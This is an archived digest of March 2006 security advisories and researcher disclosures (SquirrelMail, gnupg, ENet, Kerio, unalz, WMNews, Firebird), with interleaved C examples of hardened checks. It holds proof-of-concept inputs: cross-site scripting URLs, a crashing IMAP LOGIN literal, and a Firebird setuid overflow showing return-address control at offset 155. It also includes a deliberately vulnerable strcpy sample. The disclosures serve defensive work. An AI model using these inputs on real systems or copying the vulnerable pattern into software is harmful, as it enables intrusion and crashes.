[ GLSA 200603-09 ] SquirrelMail: Cross-site scripting and IMAP command injection

2006-03-13 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: SquirrelMail: Cross-site scripting and IMAP command injection
      Date: March 12, 2006
      Bugs: #123781
        ID: 200603-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SquirrelMail is vulnerable to several cross-site scripting
vulnerabilities and IMAP command injection.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  mail-client/squirrelmail          < 1.4.6                 >= 1.4.6

Description
===========

SquirrelMail does not validate the right_frame parameter in
webmail.php, possibly allowing frame replacement or cross-site
scripting (CVE-2006-0188). Martijn Brinkers and Scott Hughes discovered
that MagicHTML fails to handle certain input correctly, potentially
leading to cross-site scripting (only Internet Explorer,
CVE-2006-0195). Vicente Aguilera reported that the
sqimap_mailbox_select function did not strip newlines from the mailbox
or subject parameter, possibly allowing IMAP command injection
(CVE-2006-0377).

Impact
======

By exploiting the cross-site scripting vulnerabilities, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc. A remote attacker could exploit the IMAP command
injection to execute arbitrary IMAP commands on the configured IMAP
server.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =mail-client/squirrelmail-1.4.6

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

References
==========

  [ 1 ] CVE-2006-0188
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0188
  [ 2 ] CVE-2006-0195
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0195
  [ 3 ] CVE-2006-0377
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0377

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




[ GLSA 200603-10 ] Cube: Multiple vulnerabilities

2006-03-13 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Cube: Multiple vulnerabilities
      Date: March 13, 2006
      Bugs: #125289
        ID: 200603-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Cube is vulnerable to a buffer overflow, invalid memory access and
remote client crashes, possibly leading to a Denial of Service or
remote code execution.

Background
==========

Cube is an open source first person shooter game engine supporting
multiplayer via LAN or internet.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  games-fps/cube                  <= 20050829             Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===========

Luigi Auriemma reported that Cube is vulnerable to a buffer overflow in
the sgetstr() function (CVE-2006-1100) and that the sgetstr() and
getint() functions fail to verify the length of the supplied argument,
possibly leading to the access of invalid memory regions
(CVE-2006-1101). Furthermore, he discovered that a client crashes when
asked to load specially crafted mapnames (CVE-2006-1102).

Impact
======

A remote attacker could exploit the buffer overflow to execute
arbitrary code with the rights of the user running cube. An attacker
could also exploit the other vulnerabilities to crash a Cube client or
server, resulting in a Denial of Service.

Workaround
==========

Play solo games or restrict your multiplayer games to trusted parties.

Resolution
==========

Upstream stated that there will be no fixed version of Cube, thus the
Gentoo Security Team decided to hardmask Cube for security reasons. All
Cube users are encouraged to uninstall Cube:

# emerge --ask --unmerge games-fps/cube

References
==========

  [ 1 ] CVE-2006-1100
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1100
  [ 2 ] CVE-2006-1101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1101
  [ 3 ] CVE-2006-1102
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1102

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-10.xml





[USN-262-1] Ubuntu 5.10 installer password disclosure

2006-03-13 Thread Martin Pitt
===========================================================
Ubuntu Security Notice USN-262-1            March 12, 2006
Ubuntu 5.10 installer vulnerability
https://launchpad.net/bugs/34606
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

base-config
passwd

The problem can be corrected by upgrading the affected package to
version 2.67ubuntu20 (base-config) and 1:4.0.3-37ubuntu8 (passwd).  In
general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Karl Øie discovered that the Ubuntu 5.10 installer failed to clean
passwords in the installer log files. Since these files were
world-readable, any local user could see the password of the first
user account, which has full sudo privileges by default.

The updated packages remove the passwords and additionally make the
log files readable only by root.

This does not affect the Ubuntu 4.10, 5.04, or the upcoming 6.04
installer.  However, if you upgraded from Ubuntu 5.10 to the current
development version of Ubuntu 6.04 ('Dapper Drake'), please ensure
that you upgrade the passwd package to version 1:4.0.13-7ubuntu2 to
fix the installer log files.






[USN-264-1] gnupg vulnerability

2006-03-13 Thread Martin Pitt
===========================================================
Ubuntu Security Notice USN-264-1            March 13, 2006
gnupg vulnerability
CVE-2006-0049
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gnupg

The problem can be corrected by upgrading the affected package to
version 1.2.4-4ubuntu2.3 (for Ubuntu 4.10), 1.2.5-3ubuntu5.3 (for
Ubuntu 5.04), or 1.4.1-1ubuntu1.2 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Tavis Ormandy discovered a flaw in gnupg's signature verification. In
some cases, certain invalid signature formats could cause gpg to
report a 'good signature' result for auxiliary unsigned data which was
prepended or appended to the checked message part.




directory traversal Fixed in DirectContact 0.3c

2006-03-13 Thread lionel
Hi,

This security hole is fixed in version 0.3c.

The patch is automatically applied when DirectContact is restarted.

Regards,

Lionel Reyero


[SECURITY] [DSA 994-1] New freeciv packages fix denial of service

2006-03-13 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 994-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 13th, 2006                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: freeciv
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0047
BugTraq ID : 16975
Debian Bug : 355211

Luigi Auriemma discovered a denial of service condition in the free
Civilization server that allows a remote user to trigger a server
crash.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 2.0.1-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.8-1.

We recommend that you upgrade your freeciv-server package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.



Multiple vulnerabilities in ENet library (Jul 2005)

2006-03-13 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  ENet library
  http://enet.bespin.org
Versions:     <= Jul 2005 (it's the current CVS version)
Platforms:Windows, *nix, *BSD and more
Bugs: A] invalid memory access (32 bit)
  B] allocation abort with fragment
Exploitation: remote
Date: 12 Mar 2006
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:http://aluigi.altervista.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===============
1) Introduction
===============


ENet is a powerful open source library for handling UDP connections (it
can be described as a sort of TCP over UDP).
It is widely used in games and engines such as Cube, Sauerbraten,
Duke3d_w32 and others.


###

=======
2) Bugs
=======

---------------------------------
A] invalid memory access (32 bit)
---------------------------------

ENet uses 32 bit numbers for almost all the parameters in its packets,
such as fragment offsets, data sizes, timestamps, challenge numbers and
so on.
Each packet received by the library (enet_host_service) is handled by
the enet_protocol_handle_incoming_commands function.
This function uses a pointer (currentData) which points to the current
command; each packet can contain one or more commands, which describe
operations such as a connection request, an acknowledge, a fragment, a
message and more.
The check that prevents this pointer from pointing past the end of the
received packet can be bypassed with a large header.commandLength value
(which becomes negative on a 32 bit CPU).
After the check has been bypassed, currentData points to an invalid
region of memory, and when the loop continues with the next command
(commandCount must be greater than one) the application crashes.
64 bit CPUs should not be vulnerable.

From enet_protocol_handle_incoming_commands in protocol.c:
...
    currentData = host -> receivedData + sizeof (ENetProtocolHeader);

    while (commandCount > 0 &&
           currentData < & host -> receivedData [host -> receivedDataLength])
    {
       command = (ENetProtocol *) currentData;

       if (currentData + sizeof (ENetProtocolCommandHeader) > & host -> receivedData [host -> receivedDataLength])
         return 0;

       command -> header.commandLength = ENET_NET_TO_HOST_32 (command -> header.commandLength);

       /* the pointer sum on the left wraps around on a 32 bit CPU when
          commandLength is large, so the comparison can be bypassed */
       if (currentData + command -> header.commandLength > & host -> receivedData [host -> receivedDataLength])
         return 0;

       -- commandCount;
       currentData += command -> header.commandLength;
...
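A hardened form of the bounds check described above, as an added example (not ENet's code): the packet layout, the HEADER_LEN/CMD_HEADER_LEN constants, the constructed sample packets and the walk_commands/naive_check_accepts functions are stand-ins written for this demonstration. naive_check_accepts models why the original pointer comparison passes for a huge commandLength on a 32 bit address space; walk_commands compares the length against the bytes that remain, which cannot wrap.

```c
/* Added example, not ENet's code: a stand-in for the command walk in
 * enet_protocol_handle_incoming_commands with the bounds check expressed as
 * "does commandLength fit in the bytes remaining" instead of a pointer sum.
 * The packet layout is a constructed simplification: a HEADER_LEN byte packet
 * header, then commands that each begin with a big-endian 32-bit commandLength
 * covering the whole command (the real ENet structs carry more fields). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define HEADER_LEN     4u   /* stands in for sizeof (ENetProtocolHeader) */
#define CMD_HEADER_LEN 4u   /* stands in for sizeof (ENetProtocolCommandHeader) */

static uint32_t load_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Model of the original test "currentData + commandLength > end" with
 * addresses held as 32-bit unsigned values, as they are on a 32-bit CPU.
 * Returns 1 when the command would be accepted. */
int naive_check_accepts(uint32_t base_addr, uint32_t pkt_len,
                        uint32_t cmd_offset, uint32_t cmd_len)
{
    uint32_t end = base_addr + pkt_len;
    uint32_t cur = base_addr + cmd_offset;
    return (uint32_t)(cur + cmd_len) <= end;   /* the sum wraps for huge cmd_len */
}

/* Hardened walk over the commands of one received packet.
 * Returns the number of commands consumed, or -1 if any command header is
 * truncated, any command is shorter than its own header, or any command is
 * longer than what remains in the packet. */
int walk_commands(const uint8_t *pkt, size_t pkt_len, unsigned command_count)
{
    if (pkt_len < HEADER_LEN)
        return -1;

    size_t offset = HEADER_LEN;
    int parsed = 0;

    while (command_count > 0 && offset < pkt_len) {
        size_t remaining = pkt_len - offset;          /* cannot underflow: offset < pkt_len */
        if (remaining < CMD_HEADER_LEN)
            return -1;                                /* command header runs past the packet */

        uint32_t cmd_len = load_be32(pkt + offset);
        if (cmd_len < CMD_HEADER_LEN || cmd_len > remaining)
            return -1;                                /* 0xFFFFFFF0 is refused here, no wrap */

        offset += cmd_len;
        ++parsed;
        --command_count;
    }
    return parsed;
}

/* Constructed packets: a 4-byte header, then commands whose first 4 bytes
 * are the big-endian commandLength. */
static const uint8_t GOOD_PKT[] = {
    0, 0, 0, 0,                                  /* packet header */
    0x00, 0x00, 0x00, 0x08, 1, 2, 3, 4,          /* command 1: length 8 */
    0x00, 0x00, 0x00, 0x06, 5, 6                 /* command 2: length 6 */
};
static const uint8_t BAD_PKT[] = {
    0, 0, 0, 0,                                  /* packet header */
    0xFF, 0xFF, 0xFF, 0xF0, 1, 2, 3, 4,          /* command 1: "negative" length */
    0x00, 0x00, 0x00, 0x06, 5, 6                 /* command 2 is never reached */
};

int good_packet_commands(void) { return walk_commands(GOOD_PKT, sizeof GOOD_PKT, 2); }
int bad_packet_commands(void)  { return walk_commands(BAD_PKT, sizeof BAD_PKT, 2); }

/* The wrapped comparison the advisory describes: with a 32-bit address space
 * the sum base + 4 + 0xFFFFFFF0 lands below the packet end, so the original
 * check passes and the walk would continue from an invalid address. */
int naive_check_bypassed(void)
{
    return naive_check_accepts(0x10000000u, sizeof BAD_PKT, HEADER_LEN, 0xFFFFFFF0u);
}

int main(void)
{
    printf("good packet: %d commands\n", good_packet_commands());          /* 2 */
    printf("bad packet: %d\n", bad_packet_commands());                     /* -1 */
    printf("naive check accepts bad packet: %d\n", naive_check_bypassed());/* 1 */
    return 0;
}
```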


---------------------------------
B] allocation abort with fragment
---------------------------------

ENet also supports fragments, which are used to build messages bigger
than the receiver's MTU.
When a fragment is received the library allocates the total message size
in memory so that it can rebuild all the subsequent fragments into this
buffer.
If the total data size specified by the attacker cannot be allocated,
the library calls abort() and the whole program terminates.

From enet_protocol_handle_send_fragment in protocol.c:
...
       startCommand = enet_peer_queue_incoming_command (peer,
                                                        & hostCommand,
                                                        enet_packet_create (NULL, totalLength, ENET_PACKET_FLAG_RELIABLE),
                                                        fragmentCount);


###

===========
3) The Code
===========


http://aluigi.altervista.org/poc/enetx.zip


###

======
4) Fix
======


No fix.
No reply from the developers.


###


--- 
Luigi Auriemma
http://aluigi.altervista.org


[SECURITY] [DSA 995-1] New metamail packages fix arbitrary code execution

2006-03-13 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 995-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                                 Steve Kemp
March 13th, 2006                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: metamail
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0709
BugTraq ID : 16611
Debian Bug : 352482

Ulf Harnhammar discovered a buffer overflow in metamail, an
implementation of MIME (Multi-purpose Internet Mail Extensions), that
could lead to a denial of service or potentially execute arbitrary
code when processing messages.

For the old stable distribution (woody) this problem has been fixed in
version 2.7-45woody.4.

For the stable distribution (sarge) this problem has been fixed in
version 2.7-47sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 2.7-51.

We recommend that you upgrade your metamail package.



Kerio MailServer bugfun

2006-03-13 Thread Evgeny Legerov
Hi,

It should be noted that ProtoVer Sample IMAP testsuite has been released
with 3 unpublished bugs.

Now it looks like the Kerio MailServer preauth bug has been fixed.

Kerio MailServer 6.1.3 changelog:

Version 6.1.3 Patch 1 - March 9, 2006
- Fixed possible crash when handling special crafted IMAP LOGIN command.


The bug itself is really simple:
$ ls PROTOVER_SAMPLE_IMAP-1.0/audit/
iaemailserver-5.3.4  keriomailserver-6.1.2  merak-8.3.0
$ cat PROTOVER_SAMPLE_IMAP-1.0/audit/keriomailserver-6.1.2
a001 LOGIN {4294967294}
LITERAL TOKEN
a002 LOGOUT


Regards,
Evgeny Legerov
www.gleg.net
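As an added example (not Kerio MailServer's code and not part of the ProtoVer suite), a defensive parser for the {N} literal count at the end of an IMAP command line such as the one quoted above; MAX_LITERAL is an assumed server policy limit, and parse_literal_count, literal_value and literal_buffer_size are names constructed for this demonstration.

```c
/* Added example, not Kerio MailServer's code: parse the "{N}" literal count
 * that ends an IMAP command line and bound it by a server policy before any
 * buffer is sized from it. The CRLF allowance is added with an explicit
 * overflow check, a general hazard whenever a 32-bit wire count is used
 * directly (no claim is made here about the root cause of the Kerio bug). */
#include <ctype.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LITERAL 65536u   /* assumed policy: a LOGIN argument never needs more */

/* Returns 0 and stores N on success; -1 on malformed syntax or N > MAX_LITERAL. */
int parse_literal_count(const char *line, uint32_t *count)
{
    const char *open = strrchr(line, '{');
    if (open == NULL || !isdigit((unsigned char)open[1]))
        return -1;                                   /* no literal, or sign/space after '{' */

    errno = 0;
    char *end;
    unsigned long long n = strtoull(open + 1, &end, 10);
    if (errno == ERANGE)
        return -1;                                   /* did not even fit in 64 bits */
    if (*end == '+')                                 /* non-synchronizing literal, RFC 2088 */
        ++end;
    if (*end != '}' || (end[1] != '\0' && strcmp(end + 1, "\r\n") != 0))
        return -1;                                   /* junk after the closing brace */
    if (n > MAX_LITERAL)
        return -1;                                   /* {4294967294} is refused here */

    *count = (uint32_t)n;
    return 0;
}

/* Convenience wrapper: the parsed count, or -1 when the line is rejected. */
long long literal_value(const char *line)
{
    uint32_t n = 0;
    return parse_literal_count(line, &n) == 0 ? (long long)n : -1;
}

/* Receive-buffer size for the literal plus its trailing CRLF.
 * Returns 0 if count + 2 would wrap size_t (possible on a 32-bit build when
 * the count is taken from the wire without the policy check above). */
size_t literal_buffer_size(uint32_t count)
{
    if ((size_t)count > SIZE_MAX - 2)
        return 0;
    return (size_t)count + 2;
}
```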


[SECURITY] [DSA 993-2] New GnuPG packages fix broken signature check

2006-03-13 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 993-2                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
March 13th, 2006                        http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: gnupg
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2006-0049

Tavis Ormandy noticed that gnupg, the GNU privacy guard - a free PGP
replacement, can be tricked to emit a good signature status message
when a valid signature is included which does not belong to the data
packet.  This update basically adds fixed packages for woody whose
version turned out to be vulnerable as well.

For the old stable distribution (woody) this problem has been fixed in
version 1.0.6-4woody5.

For the stable distribution (sarge) this problem has been fixed in
version 1.4.1-1.sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.4.2.2-1.

We recommend that you upgrade your gnupg package.



Secunia Research: unalz Filename Handling Directory Traversal Vulnerability

2006-03-13 Thread Secunia Research
== 

 Secunia Research 13/03/2006

 - unalz Filename Handling Directory Traversal Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

== 
1) Affected Software 

* unalz version 0.53.

Other versions may also be affected.

== 
2) Severity 

Rating: Less Critical
Impact: System access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in unalz, which
potentially can be exploited by malicious people to compromise a
user's system.

The vulnerability is caused due to an input validation error when
extracting an ALZ archive. This makes it possible to have files
extracted to arbitrary locations outside the specified directory
using the ../ directory traversal sequence.

The vulnerability has been confirmed in version 0.53. Other versions
may also be affected.
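
The check that closes this class of bug, as an added example that is not
unalz's own code: before an entry is written to disk, its archive name is
examined and rejected if it is absolute, carries a drive letter, or contains
any ".." component. Both '/' and '\' are treated as separators, an assumption
made because ALZ archives are normally produced by the Windows tool ALZip.
The function names and the "/tmp/out" target directory are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if an archive entry name may be extracted below the target
 * directory, 0 if it could escape it.  Both '/' and '\\' are separators
 * (assumption: ALZ entries written on Windows may carry backslashes, and
 * treating both is the conservative choice). */
int alz_entry_path_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0)
        return 0;
    /* Absolute paths: "/etc/passwd", "\\foo", "C:\\boot.ini", "C:foo". */
    if (name[0] == '/' || name[0] == '\\')
        return 0;
    if (len >= 2 && isalpha((unsigned char)name[0]) && name[1] == ':')
        return 0;
    /* Walk the components; any component equal to ".." is a traversal.
     * A component such as "a..b" is harmless and is allowed. */
    const char *p = name;
    while (*p) {
        const char *end = p;
        while (*end && *end != '/' && *end != '\\')
            end++;
        if (end - p == 2 && p[0] == '.' && p[1] == '.')
            return 0;
        p = *end ? end + 1 : end;
    }
    return 1;
}

/* Joins outdir and the entry name into dest (POSIX separators), but only
 * after the name has passed the check above.  Returns 0 on success, -1 if
 * the name is unsafe or the result does not fit. */
int alz_build_dest_path(char *dest, size_t size, const char *outdir,
                        const char *name)
{
    if (!alz_entry_path_is_safe(name))
        return -1;
    int n = snprintf(dest, size, "%s/%s", outdir, name);
    if (n < 0 || (size_t)n >= size)
        return -1;
    /* Normalise backslashes so a Windows-style entry lands in a
     * subdirectory instead of producing a file literally named "a\b". */
    for (char *q = dest + strlen(outdir) + 1; *q; q++)
        if (*q == '\\')
            *q = '/';
    return 0;
}

/* Convenience wrapper with a fixed (hypothetical) output directory.
 * Returns the destination path, or NULL if the entry was rejected. */
const char *alz_dest_for(const char *name)
{
    static char dest[256];
    return alz_build_dest_path(dest, sizeof dest, "/tmp/out", name) == 0
           ? dest : NULL;
}

int main(void)
{
    /* Constructed sample entry names, including the traversal case. */
    const char *samples[] = { "docs/readme.txt", "../../etc/passwd",
                              "/etc/passwd", "a\\..\\b", "C:\\boot.ini" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *d = alz_dest_for(samples[i]);
        printf("%-20s -> %s\n", samples[i], d ? d : "REJECTED");
    }
    return 0;
}
```

The name check alone is not the whole story for formats that can carry
symbolic links: an archive could first extract a link pointing outside the
target directory and then a file through it, so an extractor that supports
links must also refuse to follow them while writing.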

== 
4) Solution 

Update to version 0.55. 

== 
5) Time Table 

02/03/2006 - Initial vendor notification.
10/03/2006 - Initial vendor reply.
13/03/2006 - Public disclosure.

== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2006-0950 for the vulnerability.

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-16/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





WMNews Cross Site Scripting

2006-03-13 Thread exalibur33
-
WMNews Cross Site Scripting 

Site:http://wartamikael.org/PHPScripts/
Demo:http://www.scriptevi.com/files/demo/news/wmnews/

---
Credit : R00T3RR0R
webpage:www.biyosecurity.be
Mail   :[EMAIL PROTECTED]

-
WMNews

http://victim/path/wmview.php?ArtCat=;<script>alert(/R00T3RR0R/)</script>
http://victim/path/footer.php?ctrrowcol=;<script>alert(/R00T3RR0R/)</script>
http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID=;<script>alert(/R00T3RR0R/)</script>



Source:

http://www.blogcu.com/Liz0ziM/350164/

http://biyosecurity.be/bugs/wmnews.txt



Buffer Overflow and Installation Script Error in Firebird 1.5.3

2006-03-13 Thread Joxean Koret
Hi to all!

In the latest Firebird release (1.5.3) various security problems have
been fixed. Attached is an advisory about two of these.

---
Joxean Koret


---
 Buffer Overflow and Installation Script Error in Firebird 1.5.3
---

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country

---

Affected software description:
~~

Product: Firebird 
Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs
on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent
concurrency, high performance, and powerful language support for stored
procedures and triggers. It has been used in production systems, under a
variety of names, since 1981.

Web : http://firebird.sourceforge.net

---

Vulnerability List:
~~~

A.- Install script makes fb_inet_server and fbserver setuid firebird unnecessarily
B.- Buffer overflow in the setuid firebird fb_inet_server and fbserver binaries

Vulnerabilities:


A.- Install script makes fb_inet_server and fbserver setuid firebird unnecessarily

 - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server
and fbserver setuid firebird, but this is unnecessary. If you take a look at the
install script firebird1.5.2./scripts/postinstall.sh you will see the
following lines:

(...)
# SUID is still needed for group direct access.  General users
# cannot run though.
for i in fb_lock_mgr gds_drop fb_inet_server
do
if [ -f $i ]
  then
chmod ug=rx,o= $i
chmod ug+s $i
fi
done
(...)

but, as the author says, fb_inet_server (at least) does not need to be setuid
firebird. The following is a fragment of the response of Alex Peshkov (a
Firebird developer) about this problem:

They need not and should not be set*id. And in standard precompiled
binaries fbserver is not setuid. But for reasons unknown to me
fb_inet_server is made setuid 'firebird' by the install script (Debian guys
fixed it, I think). I noticed it, unfortunately, after the release of
1.5.2, but will definitely fix it in future releases. Besides the security
vulnerability, this brings an additional problem when one wants to change the
fb_inet_server run-user: changing only the xinetd.d entry is not enough.

 - Debian distributions are not vulnerable to this problem. As Alex Peshkov
says, the Debian maintainers have already fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

 - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable
to a buffer overflow. If a string of more than 150 characters is passed to the
'-p' parameter of either binary, the program crashes with a Segmentation Fault
message.

 - The following is a test of the vulnerability:
 
/usr/lib/firebird2/bin$ ls
fb_lock_print  fbguard  fbmgr  fbmgr.bin  fbserver  gsec
/usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
Segmentation fault

The program dies abruptly. The four payload bytes at offsets 155 through 158,
i.e. the characters immediately following the 155 'a's, overwrite the saved
return address:

/usr/lib/firebird2/bin$ gdb ./fbserver
GNU gdb 6.3
(...)
(gdb) run -p `perl -e 'print "a"x155;'`4321
Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print "a"x155;'`4321
(...)   
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1210892160 (LWP 25358)]
0x31323334 in ?? ()

We have overwritten the return address with the bytes 0x31 0x32 0x33 0x34, the
ASCII codes of the characters '1', '2', '3', '4'. The string 4321 shows up
reversed because x86 is little-endian: the first byte written ('4', 0x34)
becomes the least significant byte of the 32-bit address.

(gdb) where
#0  0x31323334 in ?? ()
#1  0x08233496 in ?? ()
#2  0x in ?? ()
#3  0xb9b0 in ?? ()
#4  0x6161 in ?? ()
#5  0x in ?? ()
#6  0x in ?? ()
#7  0x in ?? ()
#8  0x in ?? ()
#9  0x in ?? ()
#10 0xb9b0 in ?? ()
#11 0x in ?? ()
#12 0x in ?? ()
#13 0x in ?? ()
#14 0xbb04 in ?? ()
#15 0x0804e370 in ?? ()
#16 0x in ?? ()
#17 0xbd50 in ?? ()
#18 0x in ?? ()
#19 0x in ?? ()
#20 0x in ?? ()
#21 0x in ?? ()
#22 0x in ?? ()
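
To make the two points above concrete (the unchecked copy of the '-p' value
and the byte order seen in gdb), here is an added example; it is not Firebird's
source. It shows an illustrative vulnerable copy into a fixed stack buffer
beside a bounds-checked replacement, a little-endian decoder that turns the
four payload bytes "4321" into 0x31323334, and an offset finder that recovers
position 155 from the crashing EIP. The buffer size of 150 is an assumption
taken from the "more than 150 characters" observation, and all function names
are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption: the advisory only says that more than 150 characters crash
 * the server, so a 150-byte buffer is used here for illustration. */
#define PORT_BUF_SIZE 150

/* Vulnerable pattern (illustrative, not Firebird's code): the option value is
 * copied into a fixed stack buffer with no length check.  With 155 'a's
 * followed by "4321" the copy runs past the buffer and, as the advisory's
 * gdb session shows, the last four bytes land on the saved return address.
 * Never call this with untrusted input. */
void vulnerable_set_port(const char *arg)
{
    char buf[PORT_BUF_SIZE];
    strcpy(buf, arg);              /* overflows when strlen(arg) >= 150 */
    (void)buf;
}

/* Hardened form: measure first, refuse anything that does not fit, then copy
 * exactly what was measured.  Returns 0 on success, -1 on rejection. */
int safe_set_port(const char *arg, char *out, size_t out_size)
{
    size_t n = strlen(arg);        /* arg is a NUL-terminated argv string */
    if (n >= out_size)
        return -1;
    memcpy(out, arg, n + 1);
    return 0;
}

/* Reads four payload bytes the way a little-endian CPU reads a 32-bit word:
 * the first byte becomes the least significant.  "4321" -> 0x31323334. */
uint32_t le32_from_bytes(const char bytes[4])
{
    return  (uint32_t)(unsigned char)bytes[0]
         | ((uint32_t)(unsigned char)bytes[1] << 8)
         | ((uint32_t)(unsigned char)bytes[2] << 16)
         | ((uint32_t)(unsigned char)bytes[3] << 24);
}

/* Given the crashing instruction pointer and the payload that was passed,
 * returns the byte offset whose four bytes became EIP, or -1 if none. */
long find_eip_offset(const char *payload, size_t len, uint32_t eip)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (le32_from_bytes(payload + i) == eip)
            return (long)i;
    return -1;
}

/* Builds the constructed payload from the advisory: 155 x 'a' then "4321". */
static size_t advisory_payload(char out[160])
{
    memset(out, 'a', 155);
    memcpy(out + 155, "4321", 5);  /* copies the trailing NUL too */
    return 159;
}

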